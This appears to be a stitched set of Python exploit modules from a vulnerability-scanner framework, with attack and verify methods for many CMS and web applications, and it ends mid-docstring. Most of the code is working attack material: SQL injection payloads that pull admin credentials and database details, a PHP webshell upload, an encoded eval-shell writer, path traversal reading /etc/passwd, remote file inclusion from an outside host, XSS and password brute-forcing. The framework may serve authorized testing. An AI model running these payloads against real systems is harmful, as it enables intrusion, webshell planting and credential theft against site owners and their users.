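 def _attack(self):
     """Attack mode: gather flag material from the target and report it.

     Fetches the landing page; when it mentions ``source.txt`` the file one
     level up is retrieved and stored as ``FlagInfo.SourceFile``.  Then
     ``../robots.txt`` is fetched: a ``<name>{...}`` token (``name`` taken from
     ``self.params``) is stored as ``FlagInfo.TextFlag`` and, on HTTP 200, the
     whole body as ``FlagInfo.FileContent``.

     Returns ``self.parse_attack(result)``.  Unlike the original, later
     findings no longer reset ``result['FlagInfo']`` and wipe earlier ones.
     """
     result = {}
     # Join the traversal path without producing a double slash.
     base = self.url if self.url.endswith('/') else self.url + '/'

     resp = req.get(self.url, allow_redirects=False)
     if "source.txt" in resp.content:
         resp = req.get(base + "../source.txt", allow_redirects=False)
         result.setdefault('FlagInfo', {})['SourceFile'] = "\n" + resp.content

     resp = req.get(base + "../robots.txt", allow_redirects=False)
     match_result = re.search(self.params['name'] + '{(.*)}', resp.content)
     if match_result:
         result.setdefault('FlagInfo', {})['TextFlag'] = (
             self.params['name'] + "{" + match_result.group(1) + "}")
     if resp.status_code == 200:
         result.setdefault('FlagInfo', {})['FileContent'] = "\n" + resp.content
     return self.parse_attack(result)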
    def _attack(self):
        """Attack mode: three chained requests against ``/blog-by-cat``.

        Request 1 reads the current database name, request 2 the name of the
        ``*administrators`` table in that schema, request 3 one
        username/password pair from it.  A parsed pair is returned through
        ``self.parse_output`` under ``result['AdminInfo']``.

        Every ``.group()`` below assumes the ``~``/``:`` markers were echoed;
        when a marker is missing ``re.search`` yields ``None`` and the call
        raises AttributeError, exactly as the original did.
        """
        result = {}
        vul_url = '%s/blog-by-cat' % self.url
        flags = re.I | re.M

        # step 1: current database name
        resp = req.get(vul_url + '/-1 union select 1,2,3,4,concat(0x7e,database(),0x3a),6,7,8')
        first = re.search(r'~(.*):', resp.content, flags).group(1)
        current_db = re.search(r'~(.*)', first, flags).group(1)

        # step 2: administrators table name; the schema is passed as a hex literal
        db_hex = '0x' + current_db.encode('hex')
        table_sqli = '/-1 union select 1,2,3,4,group_concat(0x7e,table_name,0x3a),6,7,8 from information_schema.tables where table_schema=%s' % db_hex
        resp = req.get(vul_url + table_sqli)
        second = re.search(r'~(.*administrators):', resp.content, flags).group(1)
        admin_table = re.search(r'>~(.*)', second, flags).group(1)

        # step 3: one username/password pair from that table
        column_sqli = '/-1 union select 1,2,3,4,group_concat(0x7e,username,0x3a,0x3a,0x3a,password,0x7e),6,7,8 from %s' % admin_table
        response = req.get(vul_url + column_sqli)
        if response.status_code == 200:
            outer = re.search(r'~(.*):::(.*)~', response.content, flags)
            inner = re.search(r'(.*):::(.*)~', outer.group(1), flags)
            if inner:
                result['AdminInfo'] = {
                    'Username': inner.group(1),
                    'Password': outer.group(2),
                }
        return self.parse_output(result)
	def _attack(self):
		"""Attack mode: three requests in a fixed order, then a result.

		The first GET carries the crafted ``arrs1[]``/``arrs2[]`` parameters to
		``plus/download.php``; the second touches ``plus/ad_js.php``; the
		third fetches ``plus/x.php`` and decides success from its body.
		Returns ``self.parse_result(result)`` with ``VerifyInfo`` (shell URL
		and a masked password) on a hit.
		"""
		result = {}
		target = self.url + '/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=119&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=102&arrs2[]=117&arrs2[]=99&arrs2[]=107&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35'
		# responses of the first two requests are deliberately not inspected
		req.get(target)
		req.get(self.url + '/plus/ad_js.php?aid=1&nocache=1')
		shell = req.get(self.url + '/plus/x.php')
		# NOTE(review): str.find() returns -1 when 'w' is absent and -1 is
		# truthy, so this branch is skipped only when 'w' is the very first
		# byte of the body -- the check as written cannot mean what the
		# author intended; confirm and use `'w' in shell.content` or `!= -1`.
		if shell.content.find('w'):
			result = {'VerifyInfo':{}}
			result['VerifyInfo']['shell'] = self.url + '/plus/x.php'
			result['VerifyInfo']['password'] = '******'
		return self.parse_result(result)
    def _verify(self):
        """Verify mode.

        Requests ``type.php`` with the crafted ``template`` value, then reads
        ``/data/cache_template/rss.tpl.php`` and reports ``VerifyInfo`` when
        the string ``phpinfo`` is present in that second response.  The body
        of the first response is never read.  Returns ``self.parse_output``.
        """
        payload1 = '/type.php?template=tag_(){};phpinfo();{//../rss'
        req.get(self.url + payload1)
        cached = req.get(self.url + '/data/cache_template/rss.tpl.php')

        result = {}
        if "phpinfo" in cached.content:
            result['VerifyInfo'] = {'URL': self.url}
        return self.parse_output(result)
 def _verify(self):
     """Verify mode: reflected-XSS check on ``com_googlesearch_cse``.

     A marker string is embedded in the ``q`` parameter; if the marker comes
     back verbatim in the response body, ``VerifyInfo`` (URL and payload) is
     filled in.  Returns ``self.parse_output(result)``.
     """
     # marker that must be reflected for a positive result
     pars = '<0x!!qaz_*'
     payload = '"><img+src=x+onerror=alert(/' + pars + '/)>'
     exploit = '/index.php?option=com_googlesearch_cse&n=30&Itemid=97&q='
     # browser-like request headers
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)

     result = {}
     if pars in resp.content:
         result['VerifyInfo'] = {'URL': self.url + exploit, 'Payload': payload}
     return self.parse_output(result)
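    def _verify(self):
        """Verify mode: try each password from ``getLargeWeakPassword()``.

        For every candidate the login page is fetched first so the
        ``user_token`` input and the session cookies can accompany the POST.
        Returns ``self.parse_output(result)`` with ``DBInfo`` on a hit,
        ``extra.error`` when the token check fails, and -- unlike the
        original, which fell off the loop and returned ``None`` -- an empty
        result when the list is exhausted.
        """
        result = {}
        username = '******'  # login account
        pwdlist = getLargeWeakPassword()

        for pwd in pwdlist:
            htmlTXT = req.get(self.url + "/login.php")
            Content = pq(htmlTXT.text)
            tokenStr = Content("input")
            Token = tokenStr[3].value  # assumes the token is the 4th <input> -- TODO confirm
            _cookies = htmlTXT.cookies.get_dict()  # session cookies for the POST

            payload = {'username': username, 'password': pwd, 'user_token': Token, 'Login': '******'}
            response = req.post(self.url + "/login.php", data=payload, cookies=_cookies)
            rcontent = pq(response.text)
            reqMes = rcontent('.message').text()

            if reqMes == "Login failed":
                continue  # wrong password: next candidate
            if reqMes == "CSRF token is incorrect":
                result['extra'] = {}
                result['extra']['error'] = 'user_token校验失败'
                return self.parse_output(result)  # token check failed

            # any other message is treated as a successful login
            result['DBInfo'] = {}
            result['DBInfo']['Username'] = username
            result['DBInfo']['Password'] = pwd
            return self.parse_output(result)

        # list exhausted without a hit: still hand a (empty) result back
        return self.parse_output(result)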
    def _attack(self):
        """Attack mode: POST a hand-built multipart body to
        ``index.php?ac=common_upfile``, read the stored filename from the
        response, then request ``index.php?d=`` with a path built from it.

        Returns ``self.parse_attack(result)`` (``ShellInfo`` with URL and
        content on success) when ``self.check_argv()`` is true, otherwise
        falls back to ``self._verify()``.  The three requests depend on each
        other's order.
        """
        if self.check_argv():
            result = {}

            # NOTE: self.headers is updated here but not passed to req.post below
            self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
            post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n  \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
            # upload request
            post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=')
            resp = req.post(url=post_url,data=post_data)

            # pull the stored filename out of the upload response
            if resp.status_code == 200:
                match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M)
                if match_result:
                    # request the include URL built from that filename
                    payload = "../../uploadfiles/" + match_result.group(1) + "%00"
                    vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload)
                    resp = req.get(vul_url)
                    # 202cb962... is md5(123), the value the uploaded file prints
                    if resp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in resp.content:
                        result['ShellInfo'] = {}
                        result['ShellInfo']['URL'] = vul_url
                        result['ShellInfo']['Content'] = "<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>"
            return self.parse_attack(result)

        return self._verify()
 def _attack(self):
     """Attack mode: read database user and version via ``com_estateagent``.

     The response is scanned for the ``$~~~$...***...$~~~$`` marker; the two
     captured fields are reported as ``DbInfo.Username`` and
     ``DbInfo.Version``.  Returns ``self.parse_output(result)``.
     """
     exploit = '/index.php?option=com_estateagent&act=cat&task=showCE&id='
     payload = ("1  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"
                "user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM "
                "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- -")
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     # extraction pattern: "$~~~$" <user> "***" <version> "$~~~$"
     parttern = r'\$~~~\$(.*)\*\*\*(.*)\$~~~\$'

     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=80)
     result = {}
     if '$~~~$' in resp.content:
         match = re.search(parttern, resp.content, re.M | re.I)
         if match:
             result['DbInfo'] = {
                 'Username': match.group(1),
                 'Version': match.group(2),
             }
     return self.parse_output(result)
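 def _verify(self):
     """Verify mode: look for an unauthenticated MongoDB listener.

     ``self.url`` is expected as ``[http://]host:port``.  A ``listDatabases``
     wire message is sent over a raw socket; a reply containing ``local`` is a
     hit.  Otherwise the HTTP status page on ``port + 1000`` is fetched and
     checked for ``db version`` and ``sys info``.
     Returns ``self.parse_attack(result)``.

     Fixes over the original: the socket is always closed, the scheme is
     removed as a prefix (``str.strip`` removed characters), a missing port
     no longer raises UnboundLocalError, and the HTTP URL is built from the
     parsed hostname instead of a stripped string that no longer parses.
     """
     result = {}
     payload = "\x3F\x00\x00\x00\x7E\x00\x00\x00\x00\x00\x00\x00\xD4\x07\x00\x00\x04\x00\x00\x00\x61\x64\x6D\x69\x6E\x2E\x24\x63\x6D\x64\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x18\x00\x00\x00\x10\x6C\x69\x73\x74\x44\x61\x74\x61\x62\x61\x73\x65\x73\x00\x01\x00\x00\x00\x00"
     socket.setdefaulttimeout(10)
     # parse before the scheme is removed so scheme/hostname stay available
     url_p = urlparse.urlparse(self.url)
     if self.url.startswith("http://"):
         self.url = self.url[len("http://"):]
     host = None
     port = None
     s = socket.socket()
     try:
         host = self.url.split(":")[0]
         port = int(self.url.split(":")[1])
         s.connect((host, port))
         s.send(payload)
         recvdata = s.recv(1024)
         if recvdata and 'local' in recvdata:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = self.url
             result['VerifyInfo']['Port'] = port
             return self.parse_attack(result)
     except (socket.error, ValueError, IndexError, TypeError):
         pass  # unreachable or malformed target: fall through to the HTTP probe
     finally:
         s.close()
     if port is None:
         # no port could be parsed, so there is no "port + 1000" to probe
         return self.parse_attack(result)
     url = "%s://%s:%s" % (url_p.scheme or 'http', url_p.hostname or host, str(port + 1000))
     resp = req.get(url)
     if resp.status_code == 200 and 'db version' in resp.content and 'sys info' in resp.content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = url
     return self.parse_attack(result)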
 def _verify(self):
     """Verify mode for ``com_doqment``: the response is checked for
     ``c4ca4238a0b923820dcc509a6f75849b`` (md5(1)); on a hit ``VerifyInfo``
     holds the URL and payload.  Returns ``self.parse_output(result)``.
     """
     payload = '-11/**/union/**/select/**/1,2,md5(1),4,5,6,7,8--'
     exploit = '/index.php?option=com_doqment&cid='
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)

     result = {}
     if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
         result['VerifyInfo'] = {'URL': self.url + exploit, 'Payload': payload}
     return self.parse_output(result)
 def _verify(self):
     """Verify mode for ``com_rsfiles``: the response is checked for
     ``63e1f04640e83605c1d177544a5a0488`` (md5(3.1415)); on a hit
     ``VerifyInfo`` holds the URL and payload.  Returns ``self.parse_output``.
     """
     exploit = '/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid='
     payload = "-1/**/aNd/**/1=0/**/uNioN++sElecT+1,md5(3.1415)--"
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)

     result = {}
     if '63e1f04640e83605c1d177544a5a0488' in resp.content:
         result['VerifyInfo'] = {'URL': self.url + exploit, 'Payload': payload}
     return self.parse_output(result)
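    def _attack(self):
        """Attack mode: read one admin username/password pair through
        ``respond.php`` and return ``self.parse_attack(result)``.

        The table prefix comes from ``self.get_table_pre``; when it is
        ``None`` an empty result is returned.  The request is repeated up to
        ten times, as in the original, until the ``~~~user|||pass~~~``
        marker is found.  Any exception is printed with a traceback and still
        yields a parsed (empty) result -- the original returned ``None``.
        """
        result = {}
        try:
            table_pre = self.get_table_pre(self.url)
            if table_pre is None:
                return self.parse_attack(result)
            data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(CHAR(126),CHAR(126),CHAR(126),user_name,CHAR(124),CHAR(124),CHAR(124),password,CHAR(126),CHAR(126),CHAR(126)) from {table_pre}_admin_user limit 1))a from information_schema.tables group by a)b%23".format(
                table_pre=table_pre)
            url = self.get_standard_url(data, self.url)

            pattern = re.compile(r"~~~(\w+?)\|\|\|(\w+?)~~~")

            for _ in range(10):
                r = req.get(url)
                re_result = pattern.findall(r.content.decode(r.encoding))
                if re_result:
                    result['AdminInfo'] = {
                        'Username': re_result[0][0],
                        'Password': re_result[0][1],
                    }
                    break
        except Exception:
            # narrowed from a bare except so KeyboardInterrupt still propagates
            import traceback
            traceback.print_exc()
        return self.parse_attack(result)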
 def _verify(self):
     """Verify mode: remote-file-inclusion check through ``basePath``.

     The referenced text file is expected to print md5('3.1416'); when that
     digest (``d4d7a6b8b3ed8ed86db2ef2cd728d8ec``) appears in the response,
     ``VerifyInfo.URL`` is set.  Returns ``self.parse_output(result)``.
     """
     payload = 'http://tool.scanv.com/wsl/php_verify.txt?'
     vulurl = '{url}/index.php?basePath={evil}'.format(url=self.url, evil=payload)
     # spoofed Host plus browser-like headers
     httphead = {
         'Host': 'www.google.com',
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(vulurl, headers=httphead, timeout=50)

     result = {}
     # literal digest, so a plain substring test equals the original re.search
     if 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec' in resp.content:
         result['VerifyInfo'] = {'URL': self.url}
     return self.parse_output(result)
    def _attack(self):
        """Attack mode: POST the crafted address form, then read the address
        page back and pick the two ``~``-prefixed words out of it as
        ``AdminInfo.Username`` / ``AdminInfo.Password``.
        Returns ``self.parse_attack(result)``.
        """
        url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
        vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')

        payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
        post_data = (
            "form_submit=ok&id=&true_name[]="
            + payload
            + "&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123"
        )
        headers = {"Content-Type": "application/x-www-form-urlencoded"}

        req.post(vul_url, data=post_data, headers=headers)
        res = req.get(url)

        result = {}
        if res.status_code == 200:
            found = re.findall(r'~\w*', res.content, re.I | re.M)
            if found:
                # strip the leading "~" from each marker; raises IndexError
                # with a single match, as the original did
                result['AdminInfo'] = {
                    'Username': found[0][1:],
                    'Password': found[1][1:],
                }
        return self.parse_attack(result)
 def _attack(self):
     """Attack mode for ``com_doqment``: read database version and user.

     The response is scanned for ``$~~~$<version>***<user>$~~~$``; the two
     captures go to ``DatabaseInfo.Version`` / ``DatabaseInfo.Username``.
     Returns ``self.parse_output(result)``.
     """
     payload = "-11/**/union/**/select/**/1,2,concat(0x247e7e7e24,version(),0x2a2a2a,user(),0x247e7e7e24),4,5,6,7,8--"
     exploit = '/index.php?option=com_doqment&cid='
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     par = r"\$~~~\$([0-9a-zA-Z_].*)\*\*\*([0-9a-zA-Z_].*)\$~~~\$"

     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)
     result = {}
     if '$~~~$' in resp.content:
         match = re.search(par, resp.content, re.I | re.M)
         if match:
             result['DatabaseInfo'] = {
                 'Version': match.group(1),
                 'Username': match.group(2),
             }
     return self.parse_output(result)
 def _verify(self):
     """Verify mode for ``com_mydyngallery``: the response is checked for
     ``c4ca4238a0b923820dcc509a6f75849b`` (md5(1)); on a hit ``VerifyInfo``
     holds the URL and payload.  Returns ``self.parse_output(result)``.
     """
     exploit = '/index.php?option=com_mydyngallery&directory='
     payload = ("1' and 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT"
                "((SELECT SUBSTRING(CONCAT(md5(1),0x247e7e7e24),1,60)),"
                "FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a) and '1'='1")
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)

     result = {}
     if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
         result['VerifyInfo'] = {'URL': self.url + exploit, 'Payload': payload}
     return self.parse_output(result)
 def _verify(self):
     """Verify mode: local-file-inclusion check via ``com_jimtawl``.

     Requests ``/etc/passwd`` through the ``task`` parameter; a 200 reply
     whose body starts with a ``root:`` passwd line counts as a hit.  Records
     the URL under ``VerifyInfo`` and the filename plus the first 32 bytes of
     the body under ``Fileinfo``.  Returns ``self.parse_output(result)``.
     """
     filename = '/etc/passwd'
     exploit = '/index.php?option=com_jimtawl&Itemid=12&task='
     dBs = '%00'  # null-byte terminator
     dots = '../../../../../../../../../../../../../../..'
     vulurl = self.url + exploit + dots + filename + dBs
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(vulurl, headers=httphead, timeout=50)

     result = {}
     looks_like_passwd = re.match('root:.+?:0:0:.+?:.+?:.+?', resp.content)
     if resp.status_code == 200 and looks_like_passwd:
         result['VerifyInfo'] = {'URL': vulurl}
         result['Fileinfo'] = {
             'Filename': filename,
             'Content': resp.content[0:32] + '...',  # truncated excerpt
         }
     return self.parse_output(result)
 def _verify(self):
     """Verify mode for ``com_timereturns``: the response is checked for
     ``c4ca4238a0b923820dcc509a6f75849b`` (md5(1)); on a hit ``VerifyInfo``
     holds the URL and payload.  Returns ``self.parse_output(result)``.
     """
     payload = ("1' AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),"
                "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB")
     exploit = '/index.php?option=com_timereturns&view=timereturns&id='
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)

     result = {}
     if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
         result['VerifyInfo'] = {'URL': self.url + exploit, 'Payload': payload}
     return self.parse_output(result)
 def _verify(self):
     """Verify mode for ``com_ignitegallery``: the response is checked for
     ``63e1f04640e83605c1d177544a5a0488`` (md5(3.1415)); on a hit
     ``VerifyInfo`` holds the URL and payload.  Returns ``self.parse_output``.
     """
     exploit = '/index.php?option=com_ignitegallery&task=view&gallery='
     payload = "-1 union select 1,2,md5(3.1415),4,5,6,7,8,9,10--"
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)

     result = {}
     if '63e1f04640e83605c1d177544a5a0488' in resp.content:
         result['VerifyInfo'] = {'URL': self.url + exploit, 'Payload': payload}
     return self.parse_output(result)
 def _verify(self):
     """Verify mode: local-file-inclusion check via ``com_jequoteform``.

     Requests ``/etc/passwd`` through the ``view`` parameter; a 200 reply
     whose body starts with a ``root:`` passwd line counts as a hit.  Records
     the URL under ``VerifyInfo`` and filename plus full body under
     ``Fileinfo``.  Returns ``self.parse_output(result)``.
     """
     filename = '/etc/passwd'
     url = '/index.php'
     exploit = '?option=com_jequoteform&view='
     dBs = '../' * 5 + '..'
     ends = '%00'
     vulurl = self.url + url + exploit + dBs + filename + ends
     # spoofed Host plus browser-like headers
     httphead = {
         'Host': 'www.google.com',
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(vulurl, headers=httphead, timeout=50)

     result = {}
     looks_like_passwd = re.match('root:.+?:0:0:.+?:.+?:.+?', resp.content)
     if resp.status_code == 200 and looks_like_passwd:
         result['VerifyInfo'] = {'URL': vulurl}
         result['Fileinfo'] = {'Filename': filename, 'Content': resp.content}
     return self.parse_output(result)
 def _attack(self):
     """Attack mode for ``com_jobprofile``: read one ``jos_users`` record.

     The response is scanned for ``$~~~$<user>***<pass>$~~~$``; the captures
     go to ``AdminInfo.Username`` / ``AdminInfo.Password``.
     Returns ``self.parse_output(result)``.
     """
     exploit = '/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
     payload = ("-1+union+all+select+1,concat(0x247e7e7e24,username,0x2a2a2a,password"
                ",0x247e7e7e24),3,4,5,6,7,8,9+from+jos_users--")
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     parttern = r'\$~~~\$(.*)\*\*\*(.*)\$~~~\$'

     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)
     result = {}
     if '$~~~$' in resp.content:
         match = re.search(parttern, resp.content, re.M | re.I)
         if match:
             result['AdminInfo'] = {
                 'Username': match.group(1),
                 'Password': match.group(2),
             }
     return self.parse_output(result)
 def _attack(self):
     """Attack mode for ``com_jeeventcalendar``: read database user/version.

     On HTTP 200 the body is scanned for ``$~~~$<user>***<version>$~~~$``;
     captures go to ``DatabaseInfo.Username`` / ``DatabaseInfo.Version``.
     Returns ``self.parse_output(result)``.
     """
     exploit = '/index.php?option=com_jeeventcalendar&view=event&Itemid=155&event_id='
     payload = "-1%22+UNION+ALL+SELECT+1,concat(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24),3,4,5,6,7,8,9,10,11%23"
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     parttern = r'\$~~~\$(.*)\*\*\*(.*)\$~~~\$'

     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)
     result = {}
     if resp.status_code == 200:
         match = re.search(parttern, resp.content, re.M | re.I)
         if match:
             result['DatabaseInfo'] = {
                 'Username': match.group(1),
                 'Version': match.group(2),
             }
     return self.parse_output(result)
 def _verify(self):
     """Verify mode for ``com_jeeventcalendar``: the response is checked for
     ``c4ca4238a0b923820dcc509a6f75849b`` (md5(1)); on a hit ``VerifyInfo``
     holds the URL and payload.  Returns ``self.parse_output(result)``.
     """
     exploit = '/index.php?option=com_jeeventcalendar&view=event&Itemid=155&event_id='
     payload = "-1%22+UNION+ALL+SELECT+1,md5(1),3,4,5,6,7,8,9,10,11%23"
     httphead = {
         'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Connection': 'keep-alive',
     }
     resp = req.get(url=self.url + exploit + payload, headers=httphead, timeout=50)

     result = {}
     if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
         result['VerifyInfo'] = {'URL': self.url + exploit, 'Payload': payload}
     return self.parse_output(result)
 def _verify(self):
     """Verify mode for ``com_idoblog``: the response is checked for
